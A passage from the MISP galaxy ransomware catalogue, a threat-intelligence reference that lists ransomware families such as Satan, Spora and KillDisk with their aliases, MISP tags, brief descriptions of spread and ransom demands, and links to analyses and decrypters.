Table 5299. Table References
Links
https://id-ransomware.blogspot.co.il/2017/01/dn-donotopen.html

GarryWeber Ransomware

It’s directed to English speaking users, therefore is able to infect worldwide. Its original name is FileSpy and FileSpy Application. It is spread using email spam, fake updates, infected attachments and so on. It encryps all your files, including: music, MS Office, etc..

The tag is: misp-galaxy:ransomware="GarryWeber Ransomware"

Table 5300. Table References
Links
https://id-ransomware.blogspot.co.il/2017/01/garryweber.html

Satan Ransomware

It’s directed to English speaking users, therefore is able to infect worldwide. Its original name is RAAS RANSOMWARE. It is spread using email spam, fake updates, infected attachments and so on. It encryps all your files, including: music, MS Office, Open Office, pictures etc.. This ransomware promotes other to download viruses and spread them as ransomware to infect other users and keep 70% of the ransom. (leaving the other 30% to Satan) https://3.bp.blogspot.com/-7fwX40eYL18/WH-tfpNjDgI/AAAAAAAADPk/KVP_ji8lR0gENCMYhb324mfzIFFpiaOwACLcB/s1600/site-raas.gif RaaS

The tag is: misp-galaxy:ransomware="Satan Ransomware"

View relationships graph

Satan Ransomware has relationships with:

similar: misp-galaxy:malpedia="Satan" with estimative-language:likelihood-probability="likely"

Table 5301. Table References
Links
https://id-ransomware.blogspot.co.il/2017/01/satan-raas.html
https://www.bleepingcomputer.com/forums/t/637811/satan-ransomware-help-support-topic-stn-extension-help-decrypt-fileshtml/
https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-january-20th-2017-satan-raas-spora-locky-and-more/
https://www.bleepingcomputer.com/news/security/new-satan-ransomware-available-through-a-ransomware-as-a-service-/
https://twitter.com/Xylit0l/status/821757718885236740

Havoc

It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, infected attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures , videos, shared online files etc..

The tag is: misp-galaxy:ransomware="Havoc"

Havoc is also known as:

HavocCrypt Ransomware

Table 5302. Table References
Links
https://id-ransomware.blogspot.co.il/2017/01/havoc-ransomware.html

CryptoSweetTooth Ransomware

The tag is: misp-galaxy:ransomware="CryptoSweetTooth Ransomware"

Table 5303. Table References
Links
https://id-ransomware.blogspot.co.il/2017/01/cryptosweettooth.html
http://sensorstechforum.com/remove-cryptosweettooth-ransomware-restore-locked-files/

Kaandsona Ransomware

The tag is: misp-galaxy:ransomware="Kaandsona Ransomware"

Kaandsona Ransomware is also known as:

RansomTroll Ransomware
Käändsõna Ransomware

Table 5304. Table References
Links
https://id-ransomware.blogspot.co.il/2017/01/kaandsona-ransomtroll.html
https://twitter.com/BleepinComputer/status/819927858437099520

LambdaLocker Ransomware

It’s directed to English and Chinese speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. Python Ransomware

The tag is: misp-galaxy:ransomware="LambdaLocker Ransomware"

Table 5305. Table References
Links
https://id-ransomware.blogspot.co.il/2017/01/lambdalocker.html
http://cfoc.org/how-to-restore-files-affected-by-the-lambdalocker-ransomware/

NMoreia 2.0 Ransomware

The tag is: misp-galaxy:ransomware="NMoreia 2.0 Ransomware"

NMoreia 2.0 Ransomware is also known as:

HakunaMatataRansomware

Table 5306. Table References
Links
https://id-ransomware.blogspot.co.il/2017/01/hakunamatata.html
https://id-ransomware.blogspot.co.il/2016_03_01_archive.html

Marlboro Ransomware

It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. Ransom is .2 bitcoin, however there is no point of even trying to pay, since this damage is irreversible. Once the ransom is paid the hacker does not return decrypt the files. Another name is DeMarlboro and it is written in language C++. Pretend to encrypt using RSA-2048 and AES-128 (really it’s just XOR)

The tag is: misp-galaxy:ransomware="Marlboro Ransomware"

Table 5307. Table References
Links
https://id-ransomware.blogspot.co.il/2017/01/marlboro.html
https://decrypter.emsisoft.com/marlboro
https://www.bleepingcomputer.com/news/security/marlboro-ransomware-defeated-in-one-day/

Spora Ransomware

It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. Sample of a spam email with a viral attachment: https://4.bp.blogspot.com/-KkJXiHG80S0/WHX4TBpkamI/AAAAAAAADDg/F_bN796ndMYnzfUsgSWMXhRxFf3Ic-HtACLcB/s1600/spam-email.png

The tag is: misp-galaxy:ransomware="Spora Ransomware"

Table 5308. Table References
Links
https://id-ransomware.blogspot.co.il/2017/01/spora-ransomware.html
https://blog.gdatasoftware.com/2017/01/29442-spora-worm-and-ransomware
http://blog.emsisoft.com/2017/01/10/from-darknet-with-love-meet-spora-ransomware/

CryptoKill Ransomware

The tag is: misp-galaxy:ransomware="CryptoKill Ransomware"

Table 5309. Table References
Links
https://id-ransomware.blogspot.co.il/2017/02/cryptokill-ransomware.html

All_Your_Documents Ransomware

The tag is: misp-galaxy:ransomware="All_Your_Documents Ransomware"

Table 5310. Table References
Links
https://id-ransomware.blogspot.co.il/2017/02/allyourdocuments-ransomware.html

SerbRansom 2017 Ransomware

The tag is: misp-galaxy:ransomware="SerbRansom 2017 Ransomware"

Table 5311. Table References
Links
https://id-ransomware.blogspot.co.il/2017/02/serbransom-2017.html
https://www.bleepingcomputer.com/news/security/ultranationalist-developer-behind-serbransom-ransomware/
https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-february-10th-2017-serpent-spora-id-ransomware/
https://twitter.com/malwrhunterteam/status/830116190873849856

Fadesoft Ransomware

The tag is: misp-galaxy:ransomware="Fadesoft Ransomware"

Table 5312. Table References
Links
https://id-ransomware.blogspot.co.il/2017/02/fadesoft-ransomware.html
https://twitter.com/malwrhunterteam/status/829768819031805953
https://twitter.com/malwrhunterteam/status/838700700586684416

HugeMe Ransomware

The tag is: misp-galaxy:ransomware="HugeMe Ransomware"

Table 5313. Table References
Links
https://id-ransomware.blogspot.co.il/2017/02/hugeme-ransomware.html
https://www.ozbargain.com.au/node/228888?page=3
https://id-ransomware.blogspot.co.il/2016/04/magic-ransomware.html

DynA-Crypt Ransomware

The tag is: misp-galaxy:ransomware="DynA-Crypt Ransomware"

DynA-Crypt Ransomware is also known as:

DynA CryptoLocker Ransomware

Table 5314. Table References
Links
https://id-ransomware.blogspot.co.il/2017/02/dyna-crypt-ransomware.html
https://www.bleepingcomputer.com/news/security/dyna-crypt-not-only-encrypts-your-files-but-also-steals-your-info/

Serpent 2017 Ransomware

The tag is: misp-galaxy:ransomware="Serpent 2017 Ransomware"

Serpent 2017 Ransomware is also known as:

Serpent Danish Ransomware

Table 5315. Table References
Links
https://id-ransomware.blogspot.co.il/2017/02/serpent-danish-ransomware.html

Erebus 2017 Ransomware

The tag is: misp-galaxy:ransomware="Erebus 2017 Ransomware"

Table 5316. Table References
Links
https://id-ransomware.blogspot.co.il/2017/02/erebus-2017-ransomware.html
https://www.bleepingcomputer.com/news/security/erebus-ransomware-utilizes-a-uac-bypass-and-request-a-90-ransom-payment/

Cyber Drill Exercise

The tag is: misp-galaxy:ransomware="Cyber Drill Exercise "

Cyber Drill Exercise is also known as:

Ransomuhahawhere

Table 5317. Table References
Links
https://id-ransomware.blogspot.co.il/2017/02/ransomuhahawhere.html

Cancer Ransomware FAKE

It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. This is a trollware that does not encrypt your files but makes your computer act crazy (like in the video in the link below). It is meant to be annoying and it is hard to erase from your PC, but possible.

The tag is: misp-galaxy:ransomware="Cancer Ransomware FAKE"

Table 5318. Table References
Links
https://id-ransomware.blogspot.co.il/2017/02/cancer-ransomware.html
https://www.bleepingcomputer.com/news/security/watch-your-computer-go-bonkers-with-cancer-trollware/

UpdateHost Ransomware

The tag is: misp-galaxy:ransomware="UpdateHost Ransomware"

Table 5319. Table References
Links
https://id-ransomware.blogspot.co.il/2017/02/updatehost-ransomware.html
https://www.bleepingcomputer.com/startups/Windows_Update_Host-16362.html

Nemesis Ransomware

The tag is: misp-galaxy:ransomware="Nemesis Ransomware"

Table 5320. Table References
Links
https://id-ransomware.blogspot.co.il/2017/01/nemesis-ransomware.html

Evil Ransomware

The tag is: misp-galaxy:ransomware="Evil Ransomware"

Evil Ransomware is also known as:

File0Locked KZ Ransomware

Table 5321. Table References
Links
https://id-ransomware.blogspot.co.il/2017/01/evil-ransomware.html
http://www.enigmasoftware.com/evilransomware-removal/
http://usproins.com/evil-ransomware-is-lurking/
https://twitter.com/jiriatvirlab/status/818443491713884161
https://twitter.com/PolarToffee/status/826508611878793219

Ocelot Ransomware (FAKE RANSOMWARE)

It’s directed to English speaking users, therefore is able to infect worldwide. This is a fake ransomware. Your files are not really encrypted, however the attacker does ask for a ransom of .03 bitcoins. It is still dangerous even though it is fake, he still go through to your computer.

The tag is: misp-galaxy:ransomware="Ocelot Ransomware (FAKE RANSOMWARE)"

Ocelot Ransomware (FAKE RANSOMWARE) is also known as:

Ocelot Locker Ransomware

Table 5322. Table References
Links
https://id-ransomware.blogspot.co.il/2017/01/ocelot-ransomware.html
https://twitter.com/malwrhunterteam/status/817648547231371264

SkyName Ransomware

It’s directed to Czechoslovakianspeaking users. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. Based on HiddenTear

The tag is: misp-galaxy:ransomware="SkyName Ransomware"

SkyName Ransomware is also known as:

Blablabla Ransomware

Table 5323. Table References
Links
https://id-ransomware.blogspot.co.il/2017/01/skyname-ransomware.html
https://twitter.com/malwrhunterteam/status/817079028725190656

MafiaWare Ransomware

The tag is: misp-galaxy:ransomware="MafiaWare Ransomware"

MafiaWare Ransomware is also known as:

Depsex Ransomware

Table 5324. Table References
Links
https://id-ransomware.blogspot.co.il/2017/01/mafiaware.html
https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-january-6th-2017-fsociety-mongodb-pseudo-darkleech-and-more/
https://twitter.com/BleepinComputer/status/817069320937345024

Globe3 Ransomware

The tag is: misp-galaxy:ransomware="Globe3 Ransomware"

Globe3 Ransomware is also known as:

Purge Ransomware

View relationships graph

Globe3 Ransomware has relationships with:

similar: misp-galaxy:ransomware="Globe2 Ransomware" with estimative-language:likelihood-probability="likely"

Table 5325. Table References
Links
https://id-ransomware.blogspot.co.il/2017/01/globe3-ransomware.html
https://www.bleepingcomputer.com/forums/t/624518/globe-ransomware-help-and-support-purge-extension-how-to-restore-fileshta/
https://www.bleepingcomputer.com/news/security/the-globe-ransomware-wants-to-purge-your-files/
https://decryptors.blogspot.co.il/2017/01/globe3-decrypter.html
https://decrypter.emsisoft.com/globe3

BleedGreen Ransomware

It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. Ransom is 500$ in bitcoins. Requires .NET Framework 4.0. Gets into your startup system and sends you notes like the one below: https://4.bp.blogspot.com/-xrr6aoB_giw/WG1UrGpmZJI/AAAAAAAAC-Q/KtKdQP6iLY4LHaHgudF5dKs6i1JHQOBmgCLcB/s1600/green1.jpg

The tag is: misp-galaxy:ransomware="BleedGreen Ransomware"

BleedGreen Ransomware is also known as:

FireCrypt Ransomware

Table 5326. Table References
Links
https://id-ransomware.blogspot.co.il/2017/01/bleedgreen-ransomware.html
https://www.bleepingcomputer.com/news/security/firecrypt-ransomware-comes-with-a-ddos-component/

BTCamant Ransomware

The tag is: misp-galaxy:ransomware="BTCamant Ransomware"

Table 5327. Table References
Links
https://id-ransomware.blogspot.co.il/2017/01/btcamant.html

X3M Ransomware

It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. It is also possible to break in using RDP Windows with the help of Pass-the-Hash system, PuTTY, mRemoteNG, TightVNC, Chrome Remote Desktop, modified version of TeamViewer, AnyDesk, AmmyyAdmin, LiteManager, Radmin and others. Ransom is 700$ in Bitcoins.

The tag is: misp-galaxy:ransomware="X3M Ransomware"

Table 5328. Table References
Links
https://id-ransomware.blogspot.co.il/2017/01/x3m-ransomware.html

GOG Ransomware

The tag is: misp-galaxy:ransomware="GOG Ransomware"

Table 5329. Table References
Links
https://id-ransomware.blogspot.co.il/2017/01/gog-ransomware.html
https://twitter.com/BleepinComputer/status/816112218815266816

RegretLocker

RegretLocker is a new ransomware that has been found in the wild in the last month that does not only encrypt normal files on disk like other ransomwares. When running, it will particularly search for VHD files, mount them using Windows Virtual Storage API, and then encrypt all the files it finds inside of those VHD files.

The tag is: misp-galaxy:ransomware="RegretLocker"

Table 5330. Table References
Links
http://chuongdong.com/reverse%20engineering/2020/11/17/RegretLocker/

EdgeLocker

The tag is: misp-galaxy:ransomware="EdgeLocker"

Table 5331. Table References
Links
https://id-ransomware.blogspot.co.il/2017/01/edgelocker-ransomware.html
https://twitter.com/BleepinComputer/status/815392891338194945

Red Alert

The tag is: misp-galaxy:ransomware="Red Alert"

View relationships graph

Red Alert has relationships with:

similar: misp-galaxy:malpedia="Red Alert" with estimative-language:likelihood-probability="likely"

Table 5332. Table References
Links
https://id-ransomware.blogspot.co.il/2017/01/red-alert-ransomware.html
https://twitter.com/JaromirHorejsi/status/815557601312329728

First

The tag is: misp-galaxy:ransomware="First"

Table 5333. Table References
Links
https://id-ransomware.blogspot.co.il/2017/01/first-ransomware.html

XCrypt Ransomware

The tag is: misp-galaxy:ransomware="XCrypt Ransomware"

Table 5334. Table References
Links
https://id-ransomware.blogspot.co.il/2017/01/xcrypt-ransomware.html
https://twitter.com/JakubKroustek/status/825790584971472902

7Zipper Ransomware

The tag is: misp-galaxy:ransomware="7Zipper Ransomware"

Table 5335. Table References
Links
https://id-ransomware.blogspot.co.il/2017/01/7zipper-ransomware.html
https://1.bp.blogspot.com/-ClM0LCPjQuk/WI-BgHTpdNI/AAAAAAAADc8/JyEQ8-pcJmsXIntuP-MMdE-pohVncxTXQCLcB/s1600/7-zip-logo.png

Zyka Ransomware

The tag is: misp-galaxy:ransomware="Zyka Ransomware"

Table 5336. Table References
Links
https://id-ransomware.blogspot.co.il/2017/01/zyka-ransomware.html
https://www.pcrisk.com/removal-guides/10899-zyka-ransomware
https://download.bleepingcomputer.com/demonslay335/StupidDecrypter.zip
https://twitter.com/GrujaRS/status/826153382557712385

SureRansom Ransomeware (Fake)

It’s directed to English speaking users, therefore is able to strike worldwide. This ransomware does not really encrypt your files. Ransom requested is £50 using credit card.

The tag is: misp-galaxy:ransomware="SureRansom Ransomeware (Fake)"

Table 5337. Table References
Links
https://id-ransomware.blogspot.co.il/2017/01/sureransom-ransomware.html
http://www.forbes.com/sites/leemathews/2017/01/27/fake-ransomware-is-tricking-people-into-paying/#777faed0381c

Netflix Ransomware

It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. This ransomware uses the known online library as a decoy. It poses as Netflix Code generator for Netflix login, but instead encrypts your files. The ransom is 100$ in Bitcoins.

The tag is: misp-galaxy:ransomware="Netflix Ransomware"

Table 5338. Table References
Links
https://id-ransomware.blogspot.co.il/2017/01/netflix-ransomware.html
http://blog.trendmicro.com/trendlabs-security-intelligence/netflix-scam-delivers-ransomware/
https://www.bleepingcomputer.com/news/security/rogue-netflix-app-spreads-netix-ransomware-that-targets-windows-7-and-10-users/
http://www.darkreading.com/attacks-breaches/netflix-scam-spreads-ransomware/d/d-id/1328012
https://4.bp.blogspot.com/-bQQ4DTIClvA/WJCIh6Uq2nI/AAAAAAAADfY/hB5HcjuGgh8rRJKeLHoIRz3Ezth22-wCEw/s1600/form1.jpg[https://4.bp.blogspot.com/-bQQ4DTIClvA/WJCIh6Uq2nI/AAAAAAAADfY/hB5HcjuGgh8rRJKeLHoIRz3Ezth22-wCEw/s1600/form1.jpg]
https://4.bp.blogspot.com/-ZnWdPDprJOg/WJCPeCtP4HI/AAAAAAAADfw/kR0ifI1naSwTAwSuOPiw8ZCPr0tSIz1CgCLcB/s1600/netflix-akk.png

Merry Christmas

It’s directed to English and Italian speaking users, therefore is able to infect worldwide. Most attacks are on organizations and servers. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. They pose as a Consumer complaint notification that’s coming from Federal Trade Commission from USA, with an attached file called “complaint.pdf”. Written in Delphi by hacker MicrRP.

The tag is: misp-galaxy:ransomware="Merry Christmas"

Merry Christmas is also known as:

Merry X-Mas
MRCR

Table 5339. Table References
Links
https://id-ransomware.blogspot.co.il/2016/12/mrcr1-ransomware.html
https://www.bleepingcomputer.com/news/security/-merry-christmas-ransomware-now-steals-user-private-data-via-diamondfox-malware/
http://www.zdnet.com/article/not-such-a-merry-christmas-the-ransomware-that-also-steals-user-data/
https://www.bleepingcomputer.com/news/security/merry-christmas-ransomware-and-its-dev-comodosecurity-not-bringing-holiday-cheer/
https://decrypter.emsisoft.com/mrcr

Seoirse Ransomware

The tag is: misp-galaxy:ransomware="Seoirse Ransomware"

Table 5340. Table References
Links
https://id-ransomware.blogspot.co.il/2016/12/seoirse-ransomware.html

KillDisk Ransomware

It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. Every file is encrypted with a personal AES-key, and then AES-key encrypts with a RSA-1028 key. Hacking by TeleBots (Sandworm). Goes under a fake name: Update center or Microsoft Update center.

The tag is: misp-galaxy:ransomware="KillDisk Ransomware"

Table 5341. Table References
Links
https://id-ransomware.blogspot.co.il/2016/12/killdisk-ransomware.html
https://www.bleepingcomputer.com/news/security/killdisk-ransomware-now-targets-linux-prevents-boot-up-has-faulty-encryption/
https://www.bleepingcomputer.com/news/security/killdisk-disk-wiping-malware-adds-ransomware-component/
http://www.zdnet.com/article/247000-killdisk-ransomware-demands-a-fortune-forgets-to-unlock-files/
http://www.securityweek.com/destructive-killdisk-malware-turns-ransomware
http://www.welivesecurity.com/2017/01/05/killdisk-now-targeting-linux-demands-250k-ransom-cant-decrypt/
https://cyberx-labs.com/en/blog/new-killdisk-malware-brings-ransomware-into-industrial-domain/

DeriaLock Ransomware

It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. Maker is arizonacode and ransom amount is 20-30$. If the victim decides to pay the ransom, he will have to copy HWID and then speak to the hacker on Skype and forward him the payment.

The tag is: misp-galaxy:ransomware="DeriaLock Ransomware"

Table 5342. Table References
Links
https://id-ransomware.blogspot.co.il/2016/12/derialock-ransomware.html
https://www.bleepingcomputer.com/news/security/new-derialock-ransomware-active-on-christmas-includes-an-unlock-all-command/

BadEncript Ransomware

The tag is: misp-galaxy:ransomware="BadEncript Ransomware"

Table 5343. Table References
Links
https://id-ransomware.blogspot.co.il/2016/12/badencript-ransomware.html
https://twitter.com/demonslay335/status/813064189719805952

AdamLocker Ransomware

The tag is: misp-galaxy:ransomware="AdamLocker Ransomware"

Table 5344. Table References
Links
https://id-ransomware.blogspot.co.il/2016/12/adamlocker-ransomware.html

Alphabet Ransomware

It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. This ransomware poses as Windows 10 Critical Update Service. Offers you to update your Windows 10, but instead encrypts your files. For successful attack, the victim must have .NET Framework 4.5.2 installed on him computer.

The tag is: misp-galaxy:ransomware="Alphabet Ransomware"

View relationships graph

Alphabet Ransomware has relationships with:

similar: misp-galaxy:malpedia="Alphabet Ransomware" with estimative-language:likelihood-probability="likely"

Table 5345. Table References
Links
https://id-ransomware.blogspot.co.il/2016/12/alphabet-ransomware.html
https://twitter.com/PolarToffee/status/812331918633172992

KoKoKrypt Ransomware

It’s directed to English speaking users, therefore is able to infect worldwide. It is spread by its creator in forums. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files and documents and more. The ransom is 0.1 bitcoins within 72 hours. Uses Windows Update as a decoy. Creator: Talnaci Alexandru

The tag is: misp-galaxy:ransomware="KoKoKrypt Ransomware"

KoKoKrypt Ransomware is also known as:

KokoLocker Ransomware

Table 5346. Table References
Links
https://id-ransomware.blogspot.co.il/2016/12/kokokrypt-ransomware.html
http://removevirusadware.com/tips-for-removeing-kokokrypt-ransomware/

L33TAF Locker Ransomware

The tag is: misp-galaxy:ransomware="L33TAF Locker Ransomware"

Table 5347. Table References
Links
https://id-ransomware.blogspot.co.il/2016/12/l33taf-locker-ransomware.html

PClock4 Ransomware

It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam (for example: “you have a criminal case against you”), fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc..

The tag is: misp-galaxy:ransomware="PClock4 Ransomware"

PClock4 Ransomware is also known as:

PClock SysGop Ransomware

Table 5348. Table References
Links
https://id-ransomware.blogspot.co.il/2016/12/pclock4-sysgop-ransomware.html

Guster Ransomware

The tag is: misp-galaxy:ransomware="Guster Ransomware"

Table 5349. Table References
Links
https://id-ransomware.blogspot.co.il/2016/12/guster-ransomware.html
https://twitter.com/BleepinComputer/status/812131324979007492

Roga

It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. The hacker requests the ransom in Play Store cards. https://3.bp.blogspot.com/-ClUef8T55f4/WGKb8U4GeaI/AAAAAAAACzg/UFD0X2sORHYTVRNBSoqd5q7TBrOblQHmgCLcB/s1600/site.png

The tag is: misp-galaxy:ransomware="Roga"

View relationships graph

Roga has relationships with:

similar: misp-galaxy:ransomware="Free-Freedom" with estimative-language:likelihood-probability="likely"

Table 5350. Table References
Links
https://id-ransomware.blogspot.co.il/2016/12/roga-ransomware.html

CryptoLocker3 Ransomware

The tag is: misp-galaxy:ransomware="CryptoLocker3 Ransomware"

CryptoLocker3 Ransomware is also known as:

Fake CryptoLocker

Table 5351. Table References
Links
https://id-ransomware.blogspot.co.il/2016/12/cryptolocker3-ransomware.html

ProposalCrypt Ransomware

The tag is: misp-galaxy:ransomware="ProposalCrypt Ransomware"

Table 5352. Table References
Links
https://id-ransomware.blogspot.co.il/2016/12/proposalcrypt-ransomware.html
http://www.archersecuritygroup.com/what-is-ransomware/
https://twitter.com/demonslay335/status/812002960083394560
https://twitter.com/malwrhunterteam/status/811613888705859586

Manifestus Ransomware

The tag is: misp-galaxy:ransomware="Manifestus Ransomware "

Table 5353. Table References
Links
https://id-ransomware.blogspot.co.il/2016/12/manifestus-ransomware.html
https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-december-23rd-2016-cryptxxx-koolova-cerber-and-more/
https://twitter.com/struppigel/status/811587154983981056

EnkripsiPC Ransomware

The tag is: misp-galaxy:ransomware="EnkripsiPC Ransomware"

EnkripsiPC Ransomware is also known as:

IDRANSOMv3
Manifestus

View relationships graph

EnkripsiPC Ransomware has relationships with:

similar: misp-galaxy:malpedia="Manifestus" with estimative-language:likelihood-probability="likely"

Table 5354. Table References
Links
https://id-ransomware.blogspot.co.il/2016/12/enkripsipc-ransomware.html
https://twitter.com/demonslay335/status/811343914712100872
https://twitter.com/BleepinComputer/status/811264254481494016
https://twitter.com/struppigel/status/811587154983981056

BrainCrypt Ransomware

The tag is: misp-galaxy:ransomware="BrainCrypt Ransomware"

Table 5355. Table References
Links
https://id-ransomware.blogspot.co.il/2016/12/braincrypt-ransomware.html

MSN CryptoLocker Ransomware

The tag is: misp-galaxy:ransomware="MSN CryptoLocker Ransomware"

Table 5356. Table References
Links
https://id-ransomware.blogspot.co.il/2016/12/msn-cryptolocker-ransomware.html
https://twitter.com/struppigel/status/810766686005719040

CryptoBlock Ransomware

The tag is: misp-galaxy:ransomware="CryptoBlock Ransomware "

Table 5357. Table References
Links
https://id-ransomware.blogspot.co.il/2016/12/cryptoblock-ransomware.html
https://twitter.com/drProct0r/status/810500976415281154

AES-NI Ransomware

The tag is: misp-galaxy:ransomware="AES-NI Ransomware "

Table 5358. Table References
Links
https://id-ransomware.blogspot.co.il/2016/12/aes-ni-ransomware.html

Koolova Ransomware

The tag is: misp-galaxy:ransomware="Koolova Ransomware"

Table 5359. Table References
Links
https://id-ransomware.blogspot.co.il/2016/12/koolova-ransomware.html
https://www.bleepingcomputer.com/news/security/koolova-ransomware-decrypts-for-free-if-you-read-two-articles-about-ransomware/

Fake Globe Ransomware

The tag is: misp-galaxy:ransomware="Fake Globe Ransomware"

Fake Globe Ransomware is also known as:

Globe Imposter
GlobeImposter

View relationships graph

Fake Globe Ransomware has relationships with:

similar: misp-galaxy:malpedia="GlobeImposter" with estimative-language:likelihood-probability="likely"

Table 5360. Table References
Links
https://id-ransomware.blogspot.co.il/2016/12/fake-globe-ransomware.html
https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-december-30th-2016-infected-tvs-and-open-source-ransomware-sucks/
https://twitter.com/fwosar/status/812421183245287424
https://decrypter.emsisoft.com/globeimposter
https://twitter.com/malwrhunterteam/status/809795402421641216
https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-june-8th-2018-crybrazil-cryptconsole-and-magniber/
https://twitter.com/GrujaRS/status/1004661259906768896

V8Locker Ransomware

The tag is: misp-galaxy:ransomware="V8Locker Ransomware"

Table 5361. Table References
Links
https://id-ransomware.blogspot.co.il/2016/12/v8locker-ransomware.html

Cryptorium (Fake Ransomware)

It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It SUPPOSEDLY encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc., however your files are not really encrypted, only the names are changed.

The tag is: misp-galaxy:ransomware="Cryptorium (Fake Ransomware)"

Table 5362. Table References
Links
https://id-ransomware.blogspot.co.il/2016/12/cryptorium-ransomware.html

Antihacker2017 Ransomware

It’s directed to Russian speaking users, there fore is able to infect mosty the old USSR countries. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc … The hacker goes by the nickname Antihacker and requests the victim to send him an email for the decryption. He does not request any money only a warning about looking at porn (gay, incest and rape porn to be specific).

The tag is: misp-galaxy:ransomware="Antihacker2017 Ransomware"

Table 5363. Table References
Links
https://id-ransomware.blogspot.co.il/2016/12/antihacker2017-ransomware.html

CIA Special Agent 767 Ransomware (FAKE!!!)

It’s directed to English speaking users, therefore is able to infect users all over the world. It is spread using email spam, fake updates, attachments and so on. It SUPPOSEDLY encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc… Your files are not really encrypted and nothing actually happens, however the hacker does ask the victim to pay a sum of 100$, after 5 days the sum goes up to 250$ and thereafter to 500$. After the payment is received, the victim gets the following message informing him that he has been fooled and he simply needed to delete the note. https://4.bp.blogspot.com/-T8iSbbGOz84/WFGZEbuRfCI/AAAAAAAACm0/SO8Srwx2UIM3FPZcZl7W76oSDCsnq2vfgCPcB/s1600/code2.jpg

The tag is: misp-galaxy:ransomware="CIA Special Agent 767 Ransomware (FAKE!!!)"

Table 5364. Table References
Links
https://id-ransomware.blogspot.co.il/2016/12/cia-special-agent-767-ransomware.html
https://www.bleepingcomputer.com/virus-removal/remove-cia-special-agent-767-screen-locker
https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-december-16th-2016-samas-no-more-ransom-screen-lockers-and-more/
https://guides.yoosecurity.com/cia-special-agent-767-virus-locks-your-pc-screen-how-to-unlock/

LoveServer Ransomware

The tag is: misp-galaxy:ransomware="LoveServer Ransomware "

Table 5365. Table References
Links
https://id-ransomware.blogspot.co.il/2016/12/loveserver-ransomware.html

Kraken Ransomware

The tag is: misp-galaxy:ransomware="Kraken Ransomware"

Table 5366. Table References
Links
https://id-ransomware.blogspot.co.il/2016/12/kraken-ransomware.html

Antix Ransomware

The tag is: misp-galaxy:ransomware="Antix Ransomware"

Table 5367. Table References
Links
https://id-ransomware.blogspot.co.il/2016/12/antix-ransomware.html

PayDay Ransomware

The tag is: misp-galaxy:ransomware="PayDay Ransomware "

Table 5368. Table References
Links
https://id-ransomware.blogspot.co.il/2016/12/payday-ransomware.html
https://twitter.com/BleepinComputer/status/808316635094380544

Slimhem Ransomware

It’s directed to English speaking users, therefore is able to infect worldwide. It is NOT spread using email spam, fake updates, attachments and so on. It simply places a decrypt file on your computer.

The tag is: misp-galaxy:ransomware="Slimhem Ransomware"

Table 5369. Table References
Links
https://id-ransomware.blogspot.co.il/2016/12/slimhem-ransomware.html

M4N1F3STO Ransomware (FAKE!!!!!)

It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc… FILES DON’T REALLY GET DELETED NOR DO THEY GET ENCRYPTED!!!!!!!

The tag is: misp-galaxy:ransomware="M4N1F3STO Ransomware (FAKE!!!!!)"

Table 5370. Table References
Links
https://id-ransomware.blogspot.co.il/2016/12/m4n1f3sto-ransomware.html

Dale Ransomware

The tag is: misp-galaxy:ransomware="Dale Ransomware"

Dale Ransomware is also known as:

DaleLocker Ransomware

UltraLocker Ransomware

The tag is: misp-galaxy:ransomware="UltraLocker Ransomware"

Table 5371. Table References
Links
https://id-ransomware.blogspot.co.il/2016/12/ultralocker-ransomware.html
https://twitter.com/struppigel/status/807161652663742465

AES_KEY_GEN_ASSIST Ransomware

The tag is: misp-galaxy:ransomware="AES_KEY_GEN_ASSIST Ransomware"

Table 5372. Table References
Links
https://id-ransomware.blogspot.co.il/2016/12/aeskeygenassist-ransomware.html
